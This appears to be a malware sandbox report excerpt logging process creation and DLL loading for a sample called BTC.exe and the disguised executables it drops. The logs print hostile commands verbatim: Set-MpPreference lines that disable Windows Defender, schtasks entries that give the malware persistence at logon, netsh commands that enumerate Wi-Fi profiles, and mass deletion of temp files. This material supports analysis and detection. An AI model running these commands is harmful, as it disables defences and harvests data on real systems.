                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exitJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: iertutil.dllJump to behavior
